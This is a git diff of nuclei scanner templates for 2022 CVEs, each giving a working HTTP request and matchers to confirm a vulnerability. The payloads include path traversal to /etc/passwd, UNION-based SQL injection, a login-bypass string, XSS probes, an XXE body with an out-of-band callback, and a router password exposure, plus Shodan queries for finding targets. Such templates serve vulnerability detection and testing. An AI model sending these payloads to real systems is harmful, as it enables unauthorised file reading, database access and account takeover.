+info: + name: elFinder <=2.1.60 - Local File Inclusion + author: pikpikcu + severity: critical + description: | + elFinder through 2.1.60 is affected by local file inclusion via connector.minimal.php. This allows unauthenticated remote attackers to read, write, and browse files outside the configured document root. This is due to improper handling of absolute file paths. + reference: + - https://www.synacktiv.com/publications/elfinder-the-story-of-a-repwning.html + - https://github.com/Studio-42/elFinder/commit/3b758495538a448ac8830ee3559e7fb2c260c6db + - https://www.synacktiv.com/publications.html + - https://nvd.nist.gov/vuln/detail/CVE-2022-26960 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N + cvss-score: 9.1 + cve-id: CVE-2022-26960 + cwe-id: CWE-22 + metadata: + verified: true + tags: cve,cve2022,lfi,elfinder + +requests: + - raw: + - | + GET /elfinder/php/connector.minimal.php?cmd=file&target=l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@/base64>&download=1 HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/07/05 diff --git a/nuclei-templates/CVE-2022/cve-2022-27927.yaml b/nuclei-templates/CVE-2022/cve-2022-27927.yaml new file mode 100644 index 0000000000..64d50a460c --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-27927.yaml @@ -0,0 +1,44 @@ +id: CVE-2022-27927 + +info: + name: Microfinance Management System 1.0 - SQL Injection + author: lucasljm2001,ekrause + severity: critical + description: | + Microfinance Management System 1.0 is susceptible to SQL Injection. + reference: + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27927 + - https://www.sourcecodester.com/sites/default/files/download/oretnom23/mims_0.zip + - https://www.exploit-db.com/exploits/50891 + - https://nvd.nist.gov/vuln/detail/CVE-2022-27927 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-27927 + cwe-id: CWE-89 + metadata: + verified: "true" + tags: microfinance,edb,cve,cve2022,sqli + +variables: + num: "999999999" + +requests: + - raw: + - | + GET /mims/updatecustomer.php?customer_number=-1'%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(md5({{num}}),1,2),NULL,NULL,NULL,NULL,NULL,NULL' HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + + - type: word + part: body + words: + - '{{md5({{num}})}}' + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/07/04 diff --git a/nuclei-templates/CVE-2022/cve-2022-28079.yaml b/nuclei-templates/CVE-2022/cve-2022-28079.yaml deleted file mode 100644 index c1b122ba24..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-28079.yaml +++ /dev/null @@ -1,45 +0,0 @@ -id: CVE-2022-28079 - -info: - name: College Management System 1.0 - SQL Injection - author: ritikchaddha - severity: high - description: | - College Management System 1.0 contains a SQL injection vulnerability via the course code parameter. - reference: - - https://github.com/erengozaydin/College-Management-System-course_code-SQL-Injection-Authenticated - - https://download.code-projects.org/details/1c3b87e5-f6a6-46dd-9b5f-19c39667866f - - https://nvd.nist.gov/vuln/detail/CVE-2022-28079 - - https://code-projects.org/college-management-system-in-php-with-source-code/ - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.8 - cve-id: CVE-2022-28079 - cwe-id: CWE-89 - metadata: - verified: "true" - tags: cve,cve2022,sqli,cms,collegemanagement - -variables: - num: "999999999" - -requests: - - raw: - - | - POST /admin/asign-single-student-subjects.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - submit=Press&roll_no=3&course_code=sd' UNION ALL SELECT CONCAT(md5({{num}}),12,21),NULL,NULL,NULL,NULL# - - matchers-condition: and - matchers: - - type: word - words: - - '{{md5({{num}})}}' - - - type: status - status: - - 302 - -# Enhanced by mp on 2022/07/15 diff --git a/nuclei-templates/CVE-2022/cve-2022-28080.yaml b/nuclei-templates/CVE-2022/cve-2022-28080.yaml new file mode 100644 index 0000000000..021d8a2b18 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-28080.yaml @@ -0,0 +1,72 @@ +id: CVE-2022-28080 + +info: + name: Royal Event - SQL Injection + author: lucasljm2001,ekrause,ritikchaddha + severity: high + description: | + Royal Event is vulnerable to a SQL injection vulnerability. + reference: + - https://www.exploit-db.com/exploits/50934 + - https://www.sourcecodester.com/sites/default/files/download/oretnom23/Royal%20Event.zip + - https://github.com/erengozaydin/Royal-Event-Management-System-todate-SQL-Injection-Authenticated + - https://nvd.nist.gov/vuln/detail/CVE-2022-28080 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2022-28080 + tags: royalevent,edb,cve,cve2022,sqli,authenticated,cms + +requests: + - raw: + - | + POST /royal_event/ HTTP/1.1 + Host: {{Hostname}} + Content-Length: 353 + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryCSxQll1eihcqgIgD + + ------WebKitFormBoundaryCSxQll1eihcqgIgD + Content-Disposition: form-data; name="username" + + {{username}} + ------WebKitFormBoundaryCSxQll1eihcqgIgD + Content-Disposition: form-data; name="password" + + {{password}} + ------WebKitFormBoundaryCSxQll1eihcqgIgD + Content-Disposition: form-data; name="login" + + + ------WebKitFormBoundaryCSxQll1eihcqgIgD-- + + - | + POST /royal_event/btndates_report.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFboH5ITu7DsGIGrD + + ------WebKitFormBoundaryFboH5ITu7DsGIGrD + Content-Disposition: form-data; name="todate" + + 1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5("{{randstr}}"),0x1,0x2),NULL-- - + ------WebKitFormBoundaryFboH5ITu7DsGIGrD + Content-Disposition: form-data; name="search" + + 3 + ------WebKitFormBoundaryFboH5ITu7DsGIGrD + Content-Disposition: form-data; name="fromdate" + + 01/01/2011 + ------WebKitFormBoundaryFboH5ITu7DsGIGrD-- + + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + words: + - '{{md5("{{randstr}}")}}' + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/07/15 diff --git a/nuclei-templates/CVE-2022/cve-2022-28219.yaml b/nuclei-templates/CVE-2022/cve-2022-28219.yaml new file mode 100644 index 0000000000..16c51b8734 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-28219.yaml @@ -0,0 +1,58 @@ +id: CVE-2022-28219 + +info: + name: Zoho ManageEngine ADAudit Plus <7600 - XML Entity Injection/Remote Code Execution + author: dwisiswant0 + severity: critical + description: | + Zoho ManageEngine ADAudit Plus before version 7060 is vulnerable to an + unauthenticated XML entity injection attack that can lead to remote code execution. + reference: + - https://www.manageengine.com/products/active-directory-audit/cve-2022-28219.html + - https://www.horizon3.ai/red-team-blog-cve-2022-28219/ + - https://manageengine.com + - https://nvd.nist.gov/vuln/detail/CVE-2022-28219 + remediation: | + Update to ADAudit Plus build 7060 or later, and ensure ADAudit Plus + is configured with a dedicated service account with restricted privileges. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-28219 + cwe-id: CWE-611 + metadata: + shodan-query: http.title:"ADAudit Plus" || http.title:"ManageEngine - ADManager Plus" + verified: "true" + tags: cve,cve2022,xxe,rce,zoho,manageengine,unauth + +requests: + - method: POST + path: + - "{{BaseURL}}/api/agent/tabs/agentData" + + headers: + Content-Type: application/json + body: | + [ + { + "DomainName": "{{Host}}", + "EventCode": 4688, + "EventType": 0, + "TimeGenerated": 0, + "Task Content": " %xxe; ]>" + } + ] + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" + + - type: word + part: body + words: + - "ManageEngine" + +# Enhanced by mp on 2022/07/04 diff --git a/nuclei-templates/CVE-2022/cve-2022-29014.yaml b/nuclei-templates/CVE-2022/cve-2022-29014.yaml new file mode 100644 index 0000000000..b7c1a26f7f --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-29014.yaml @@ -0,0 +1,38 @@ +id: CVE-2022-29014 + +info: + name: Razer Sila Gaming Router 2.0.441_api-2.0.418 - Local File Inclusion + author: edoardottt + severity: high + description: Razer Sila Gaming Router 2.0.441_api-2.0.418 is vulnerable to local file inclusion which could allow attackers to read arbitrary files. + reference: + - https://www.exploit-db.com/exploits/50864 + - https://nvd.nist.gov/vuln/detail/CVE-2022-29014 + - https://www2.razer.com/ap-en/desktops-and-networking/razer-sila + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-29014 + tags: cve,cve2022,razer,lfi,router,edb + +requests: + - raw: + - | + POST /ubus/ HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + {"jsonrpc":"2.0","id":3,"method":"call","params":["4183f72884a98d7952d953dd9439a1d1","file","read",{"path":"/etc/passwd"}]} + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/07/15 diff --git a/nuclei-templates/CVE-2022/cve-2022-29298.yaml b/nuclei-templates/CVE-2022/cve-2022-29298.yaml new file mode 100644 index 0000000000..2f75e09114 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-29298.yaml @@ -0,0 +1,39 @@ +id: CVE-2022-29298 + +info: + name: SolarView Compact 6.00 - Local File Inclusion + author: ritikchaddha + severity: high + description: SolarView Compact 6.00 is vulnerable to local file inclusion which could allow attackers to access sensitive files. + reference: + - https://www.exploit-db.com/exploits/50950 + - https://drive.google.com/file/d/1-RHw9ekVidP8zc0xpbzBXnse2gSY1xbH/view + - https://drive.google.com/file/d/1-RHw9ekVidP8zc0xpbzBXnse2gSY1xbH/view?usp=sharing + - https://nvd.nist.gov/vuln/detail/CVE-2022-29298 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-29298 + cwe-id: CWE-22 + metadata: + shodan-query: http.html:"SolarView Compact" + verified: "true" + tags: lfi,solarview,edb,cve,cve2022 + +requests: + - method: GET + path: + - "{{BaseURL}}/downloader.php?file=../../../../../../../../../../../../../etc/passwd%00.jpg" + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/07/15 diff --git a/nuclei-templates/CVE-2022/cve-2022-29383.yaml b/nuclei-templates/CVE-2022/cve-2022-29383.yaml new file mode 100644 index 0000000000..c0522654b9 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-29383.yaml @@ -0,0 +1,46 @@ +id: CVE-2022-29383 + +info: + name: NETGEAR ProSafe SSL VPN firmware - SQL Injection + author: elitebaz + severity: critical + description: | + NETGEAR ProSafe SSL VPN multiple firmware versions were discovered to contain a SQL injection vulnerability via USERDBDomains.Domainname at cgi-bin/platform.cgi. + reference: + - http://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-29383 + - https://github.com/badboycxcc/Netgear-ssl-vpn-20211222-CVE-2022-29383 + - https://nvd.nist.gov/vuln/detail/CVE-2022-29383 + - https://github.com/badboycxcc/Netgear-ssl-vpn-20211222 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-29383 + metadata: + verified: "true" + tags: cve,cve2022,sqli,netgear,router + +requests: + - raw: + - | + POST /scgi-bin/platform.cgi HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=utf-8 + + thispage=index.htm&USERDBUsers.UserName=NjVI&USERDBUsers.Password=&USERDBDomains.Domainname=geardomain'+AND+'5434'%3d'5435'+AND+'MwLj'%3d'MwLj&button.login.USERDBUsers.router_status=Login&Login.userAgent=MDpd + + - | + POST /scgi-bin/platform.cgi HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=utf-8 + + thispage=index.htm&USERDBUsers.UserName=NjVI&USERDBUsers.Password=&USERDBDomains.Domainname=geardomain'+AND+'5434'%3d'5434'+AND+'MwLj'%3d'MwLj&button.login.USERDBUsers.router_status=Login&Login.userAgent=MDpd + + req-condition: true + matchers: + - type: dsl + dsl: + - contains(body_1, "User authentication Failed") + - contains(body_2, "User Login Failed for SSLVPN User.") + condition: and + +# Enhanced by mp on 2022/07/04 diff --git a/nuclei-templates/CVE-2022/cve-2022-29548.yaml b/nuclei-templates/CVE-2022/cve-2022-29548.yaml new file mode 100644 index 0000000000..5b26802bf7 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-29548.yaml @@ -0,0 +1,44 @@ +id: CVE-2022-29548 + +info: + name: WSO2 - Cross-Site Scripting + author: edoardottt + severity: medium + description: | + WSO2 contains a reflected cross-site scripting vulnerability in the Management Console of API Manager 2.2.0, 2.5.0, 2.6.0, 3.0.0, 3.1.0, 3.2.0, and 4.0.0; API Manager Analytics 2.2.0, 2.5.0, and 2.6.0; API Microgateway 2.2.0; Data Analytics Server 3.2.0; Enterprise Integrator 6.2.0, 6.3.0, 6.4.0, 6.5.0, and 6.6.0; IS as Key Manager 5.5.0, 5.6.0, 5.7.0, 5.9.0, and 5.10.0; Identity Server 5.5.0, 5.6.0, 5.7.0, 5.9.0, 5.10.0, and 5.11.0; Identity Server Analytics 5.5.0 and 5.6.0; and WSO2 Micro Integrator 1.0.0. + reference: + - https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2021-1603 + - https://nvd.nist.gov/vuln/detail/CVE-2022-29548 + - http://packetstormsecurity.com/files/167587/WSO2-Management-Console-Cross-Site-Scripting.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-29548 + cwe-id: CWE-79 + metadata: + google-query: inurl:"carbon/admin/login" + verified: "true" + tags: cve,cve2022,wso2,xss,packetstorm + +requests: + - method: GET + path: + - "{{BaseURL}}/carbon/admin/login.jsp?loginStatus=false&errorCode=%27);alert(document.domain)//" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "CARBON.showWarningDialog('???');alert(document.domain)//???" + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/09/14 diff --git a/nuclei-templates/CVE-2022/cve-2022-30776.yaml b/nuclei-templates/CVE-2022/cve-2022-30776.yaml deleted file mode 100644 index ee863c1351..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-30776.yaml +++ /dev/null @@ -1,45 +0,0 @@ -id: CVE-2022-30776 - -info: - name: Atmail 6.5.0 - Cross-Site Scripting - author: 3th1c_yuk1 - severity: medium - description: | - Atmail 6.5.0 contains a cross-site scripting vulnerability via the index.php/admin/index/ 'error' parameter. - reference: - - https://medium.com/@bhattronit96/cve-2022-30776-cd34f977c2b9 - - https://www.atmail.com/ - - https://help.atmail.com/hc/en-us/sections/115003283988 - - https://nvd.nist.gov/vuln/detail/CVE-2022-30776 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2022-30776 - cwe-id: CWE-79 - metadata: - shodan-query: http.html:"atmail" - verified: "true" - tags: cve,cve2022,atmail,xss - -requests: - - method: GET - path: - - "{{BaseURL}}/atmail/index.php/admin/index/?error=1%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "Error: 1" - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/09/14 diff --git a/nuclei-templates/CVE-2022/cve-2022-31268.yaml b/nuclei-templates/CVE-2022/cve-2022-31268.yaml new file mode 100644 index 0000000000..b8148bb605 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-31268.yaml @@ -0,0 +1,48 @@ +id: CVE-2022-31268 + +info: + name: Gitblit 1.9.3 - Local File Inclusion + author: 0x_Akoko + severity: high + description: | + Gitblit 1.9.3 is vulnerable to local file inclusion via /resources//../ (e.g., followed by a WEB-INF or META-INF pathname). + reference: + - https://github.com/metaStor/Vuls/blob/main/gitblit/gitblit%20V1.9.3%20path%20traversal/gitblit%20V1.9.3%20path%20traversal.md + - https://vuldb.com/?id.200500 + - https://nvd.nist.gov/vuln/detail/CVE-2022-31268 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-31268 + cwe-id: CWE-22 + metadata: + shodan-query: http.html:"Gitblit" + verified: "true" + tags: cve,cve2022,lfi,gitblit + +requests: + - method: GET + path: + - "{{BaseURL}}/resources//../WEB-INF/web.xml" + + matchers-condition: and + matchers: + + - type: word + part: body + words: + - "" + - "java.sun.com" + - "gitblit.properties" + condition: and + + - type: word + part: header + words: + - "application/xml" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/07/15 diff --git a/nuclei-templates/CVE-2022/cve-2022-31373.yaml b/nuclei-templates/CVE-2022/cve-2022-31373.yaml new file mode 100644 index 0000000000..8c1c21231b --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-31373.yaml @@ -0,0 +1,45 @@ +id: CVE-2022-31373 + +info: + name: SolarView Compact 6.00 - Cross-Site Scripting + author: ritikchaddha + severity: medium + description: | + SolarView Compact 6.00 contains a cross-site scripting vulnerability via Solar_AiConf.php. An attacker can execute arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + reference: + - https://github.com/badboycxcc/SolarView_Compact_6.0_xss + - https://nvd.nist.gov/vuln/detail/CVE-2022-31373 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-31373 + cwe-id: CWE-79 + metadata: + shodan-query: http.html:"SolarView Compact" + verified: "true" + tags: cve,cve2022,xss,solarview + +requests: + - method: GET + path: + - '{{BaseURL}}/Solar_AiConf.php/%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '/Solar_AiConf.php/">' + - 'HREF="Solar_Service.php"' + condition: and + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/09/28 diff --git a/nuclei-templates/CVE-2022/cve-2022-32015.yaml b/nuclei-templates/CVE-2022/cve-2022-32015.yaml new file mode 100644 index 0000000000..cb1ba49550 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-32015.yaml @@ -0,0 +1,35 @@ +id: CVE-2022-32015 + +info: + name: Complete Online Job Search System 1.0 - SQL Injection + author: arafatansari + severity: high + description: | + Complete Online Job Search System 1.0 contains a SQL injection vulnerability via /eris/index.php?q=category&search=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. + reference: + - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/online-job-search-system/SQLi-8.md + - https://nvd.nist.gov/vuln/detail/CVE-2022-32015 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + cve-id: CVE-2022-32015 + cwe-id: CWE-89 + metadata: + verified: "true" + tags: cve,cve2022,sqli,jobsearch + +variables: + num: "999999999" + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?q=category&search=Banking%27%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,md5({{num}}),15,16,17,18,19--+" + + matchers: + - type: word + part: body + words: + - '{{md5({{num}})}}' + +# Enhanced by mp on 2022/09/28 diff --git a/nuclei-templates/CVE-2022/cve-2022-32022.yaml b/nuclei-templates/CVE-2022/cve-2022-32022.yaml deleted file mode 100644 index bbcd2e0040..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-32022.yaml +++ /dev/null @@ -1,51 +0,0 @@ -id: CVE-2022-32022 - -info: - name: Car Rental Management System 1.0 - SQL Injection - author: arafatansari - severity: high - description: | - Car Rental Management System 1.0 contains an SQL injection vulnerability via /admin/ajax.php?action=login. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. - reference: - - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-1.md - - https://nvd.nist.gov/vuln/detail/CVE-2022-32022 - - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-1.md. - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H - cvss-score: 7.2 - cve-id: CVE-2022-32022 - cwe-id: CWE-89 - metadata: - shodan-query: http.html:"Car Rental Management System" - verified: "true" - tags: cve,cve2022,carrental,cms,sqli,login-bypass - -requests: - - raw: - - | - POST /admin/ajax.php?action=login HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - username=admin'+or+'1'%3D'1'%23&password=admin - - - | - GET /admin/index.php?page=home HTTP/1.1 - Host: {{Hostname}} - - cookie-reuse: true - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'Welcome back Administrator!' - - 'action=logout' - - 'Manage Account' - condition: and - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/09/28 diff --git a/nuclei-templates/CVE-2022/cve-2022-32025.yaml b/nuclei-templates/CVE-2022/cve-2022-32025.yaml deleted file mode 100644 index aaeeb7a420..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-32025.yaml +++ /dev/null @@ -1,54 +0,0 @@ -id: CVE-2022-32025 - -info: - name: Car Rental Management System 1.0 - SQL Injection - author: arafatansari - severity: high - description: | - Car Rental Management System 1.0 contains an SQL injection vulnerability via /admin/view_car.php?id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. - reference: - - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-6.md - - https://nvd.nist.gov/vuln/detail/CVE-2022-32025 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H - cvss-score: 7.2 - cve-id: CVE-2022-32025 - cwe-id: CWE-89 - metadata: - comment: Login bypass is also possible using the payload - admin'+or+'1'%3D'1' in username. - shodan-query: http.html:"Car Rental Management System" - verified: "true" - tags: cve,cve2022,carrental,cms,sqli,authenticated - -variables: - num: "999999999" - -requests: - - raw: - - | - POST /admin/ajax.php?action=login HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - username={{username}}%23&password={{password}} - - - | - GET /admin/view_car.php?id=-1%20union%20select%201,md5({{num}}),3,4,5,6,7,8,9,10--+ HTTP/1.1 - Host: {{Hostname}} - - skip-variables-check: true - host-redirects: true - max-redirects: 2 - cookie-reuse: true - matchers-condition: and - matchers: - - type: word - part: body - words: - - '{{md5({{num}})}}' - - - type: status - status: - - 200 - -# Enhanced by md on 2022/09/26 diff --git a/nuclei-templates/CVE-2022/cve-2022-32026.yaml b/nuclei-templates/CVE-2022/cve-2022-32026.yaml new file mode 100644 index 0000000000..39e05a5192 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-32026.yaml @@ -0,0 +1,54 @@ +id: CVE-2022-32026 + +info: + name: Car Rental Management System 1.0 - SQL Injection + author: arafatansari + severity: high + description: | + Car Rental Management System 1.0 contains an SQL injection vulnerability via /admin/manage_booking.php?id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. + reference: + - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-8.md + - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-5.md + - https://nvd.nist.gov/vuln/detail/CVE-2022-32028 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + cve-id: CVE-2022-32028 + cwe-id: CWE-89 + metadata: + comment: Login bypass is also possible using the payload- admin'+or+'1'%3D'1' in username. + shodan-query: http.html:"Car Rental Management System" + verified: "true" + tags: cve,cve2022,carrental,cms,sqli,authenticated + +variables: + num: "999999999" + +requests: + - raw: + - | + POST /admin/ajax.php?action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username={{username}}&password={{password}} + - | + GET /admin/manage_booking.php?id=-1%20union%20select%201,2,3,4,5,6,md5({{num}}),8,9,10,11--+ HTTP/1.1 + Host: {{Hostname}} + + skip-variables-check: true + host-redirects: true + max-redirects: 2 + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - '{{md5({{num}})}}' + + - type: status + status: + - 200 + +# Enhanced by md on 2022/09/26 diff --git a/nuclei-templates/CVE-2022/CVE-2022-32159.yaml b/nuclei-templates/CVE-2022/cve-2022-32159.yaml similarity index 100% rename from nuclei-templates/CVE-2022/CVE-2022-32159.yaml rename to nuclei-templates/CVE-2022/cve-2022-32159.yaml diff --git a/nuclei-templates/CVE-2022/cve-2022-32409.yaml b/nuclei-templates/CVE-2022/cve-2022-32409.yaml new file mode 100644 index 0000000000..45a9d0ff2e --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-32409.yaml @@ -0,0 +1,38 @@ +id: CVE-2022-32409 + +info: + name: Portal do Software Publico Brasileiro i3geo 7.0.5 - Local File Inclusion + author: pikpikcu + severity: critical + description: Portal do Software Publico Brasileiro i3geo 7.0.5 is vulnerable to local file inclusion in the component codemirror.php, which allows attackers to execute arbitrary PHP code via a crafted HTTP request. + reference: + - https://github.com/wagnerdracha/ProofOfConcept/blob/main/i3geo_proof_of_concept.txt + - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_Local_File_Inclusion + - https://nvd.nist.gov/vuln/detail/CVE-2022-32409 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-32409 + cwe-id: CWE-94 + metadata: + shodan-query: http.html:"i3geo" + verified: "true" + tags: cve,cve2022,i3geo,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/i3geo/exemplos/codemirror.php?&pagina=../../../../../../../../../../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/07/22 diff --git a/nuclei-templates/CVE-2022/cve-2022-33119.yaml b/nuclei-templates/CVE-2022/cve-2022-33119.yaml deleted file mode 100644 index c3e01af826..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-33119.yaml +++ /dev/null @@ -1,40 +0,0 @@ -id: CVE-2022-33119 - -info: - name: NUUO NVRsolo Video Recorder 03.06.02 - Cross-Site Scripting - author: arafatansari - severity: medium - description: | - NUUO NVRsolo Video Recorder 03.06.02 contains a reflected cross-site scripting vulnerability via login.php. - reference: - - https://github.com/badboycxcc/nuuo-xss/blob/main/README.md - - https://nvd.nist.gov/vuln/detail/CVE-2022-33119 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2022-33119 - cwe-id: CWE-79 - metadata: - shodan-query: http.html:"NVRsolo" - verified: "true" - tags: cve,cve2022,nvrsolo,xss - -requests: - - raw: - - | - POST /login.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - Referer: "><" - - language=en&user=user&pass=pass&submit=Login - - matchers: - - type: dsl - dsl: - - 'contains(all_headers, "text/html")' - - 'status_code == 200' - - contains(body,'<\"?cmd=') - condition: and - -# Enhanced by mp on 2022/09/14 diff --git a/nuclei-templates/CVE-2022/cve-2022-34047.yaml b/nuclei-templates/CVE-2022/cve-2022-34047.yaml new file mode 100644 index 0000000000..50283475b9 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-34047.yaml @@ -0,0 +1,45 @@ +id: CVE-2022-34047 + +info: + name: Wavlink Set_safety.shtml - Password Exposure + author: For3stCo1d + severity: high + description: | + An access control issue in Wavlink WN530HG4 M30HG4.V5030.191116 allows attackers to obtain usernames and passwords via view-source:http://IP_ADDRESS/set_safety.shtml?r=52300 and searching for [var syspasswd]. + reference: + - https://drive.google.com/file/d/1sTQdUc12aZvJRFeb5wp8AfPdUEkkU9Sy/view?usp=sharing + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34047 + - http://packetstormsecurity.com/files/167891/Wavlink-WN530HG4-Password-Disclosure.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-34047 + cwe-id: CWE-668 + metadata: + shodan-query: http.title:"Wi-Fi APP Login" + verified: "true" + tags: cve2022,wavlink,router,exposure,packetstorm,cve + +requests: + - raw: + - | + GET /set_safety.shtml?r=52300 HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + 